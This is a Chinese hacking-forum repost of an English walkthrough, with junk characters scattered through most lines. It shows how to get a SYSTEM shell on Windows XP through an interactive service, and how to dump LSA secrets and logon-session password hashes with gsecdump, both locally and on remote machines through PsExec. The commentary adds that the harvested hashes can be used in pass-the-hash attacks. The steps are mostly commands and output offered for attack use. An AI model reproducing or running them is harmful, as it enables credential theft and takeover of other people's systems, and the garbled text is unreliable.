o get a DOS Prompt as NT system:( x: A& E+ R0 U+ B8 [$ q7 Z6 c- R! U# Y* G7 D
! \$ Z$ [8 a- uC:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
* e2 W7 g. v. F4 r5 v[SC] CreateService SUCCESS( K2 }4 {7 V' @$ P; e
' J( J& E5 k% L3 l1 \C:\>sc start shellcmdline5 a/ Z3 N7 J3 d' ]
[SC] StartService FAILED 1053:0 j a& p1 P8 i+ ~* K
8 B ]0 }4 \( `; h
The service did not respond to the start or control request in a timely fashion.
4 G& E$ X! q. |/ p$ k6 x
. E+ }1 Y z4 ~6 v' }C:\>sc delete shellcmdline
( X/ [! [/ U+ ^0 M4 K, J. G% Y[SC] DeleteService SUCCESS; c$ A- |" w+ n. n+ Q& X
* V) A- z: v6 z6 b" E: v------------
* V6 s; _4 S1 [8 b- @0 `
1 J" V8 N; x: f, ^3 |, `Then in the new DOS window:
, @5 o; J# v9 p, p8 n" z$ C$ A7 I+ G6 H6 h
Microsoft Windows XP [Version 5.1.2600]
: B1 K. W7 a* K(C) Copyright 1985-2001 Microsoft Corp.
8 o- r3 w6 p Q$ T$ E' M
4 z, I$ e G" N1 Q, I5 t% v0 UC:\WINDOWS\system32>whoami
5 m2 \, ?3 B( R- z. w# M3 LNT AUTHORITY\SYSTEM
& z* g: [ n% q1 |% Q/ K
* D* M- b9 b8 s6 x5 i+ Z$ uC:\WINDOWS\system32>gsecdump -h* L" [; K: I, ~# W
gsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se)
& O2 {8 g: }; r" |: o% X- ^usage: gsecdump [options]6 Z6 `6 g6 Z5 h9 w
& H9 y F& p* A+ x! l$ ^3 T0 c7 w& ooptions:
# R, I" \& y! K* Q( m/ u" I-h [ --help ] show help
2 y3 t* P8 x2 }. X; A-a [ --dump_all ] dump all secrets
0 ` C) O" c8 m/ G `2 t) s-l [ --dump_lsa ] dump lsa secrets
5 C* G4 X6 E! p. y2 L-w [ --dump_wireless ] dump microsoft wireless connections
, N2 O* A3 _7 i f9 O) Y F, O-u [ --dump_usedhashes ] dump hashes from active logon sessions& x. } A5 |0 q
-s [ --dump_hashes ] dump hashes from SAM/AD/ y+ ~' a- U+ _7 \$ T
" D f8 Z2 c, u' r/ _$ p
Although I like to use:
1 g8 |2 {" {9 X# ~# S, t* n, W' G ^; c3 X& P
PsExec v1.83 - Execute processes remotely$ }- G+ Q( _: d4 L
Copyright (C) 2001-2007 Mark Russinovich
* R) Y5 k+ Q8 X6 ]* m# RSysinternals - 链接标记[url]www.sysinternals.com[/url]) X% m; V+ i8 z
1 D0 _ b0 l! M. \: n3 m' t
C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT
# S; }4 I1 H1 G! ^- D$ R4 i
' l1 _: M6 ^2 Z0 |3 L7 Q6 E4 Z: rto get the hashes from active logon sessions of a remote system.6 J( e! I i$ t0 p
; c, G5 ?4 u& \* ]
These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.
: c; u5 A/ U, z" |4 M
. J2 b3 ~& _+ o提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.* K+ R5 ~& g: |& N; g, r
原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]
3 b' d% {+ {% C3 M* R O8 s
( x- a( ?9 \- O" k* l. ]* L8 W我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。
+ z' R, T# b7 Q4 N+ t$ B& H5 I |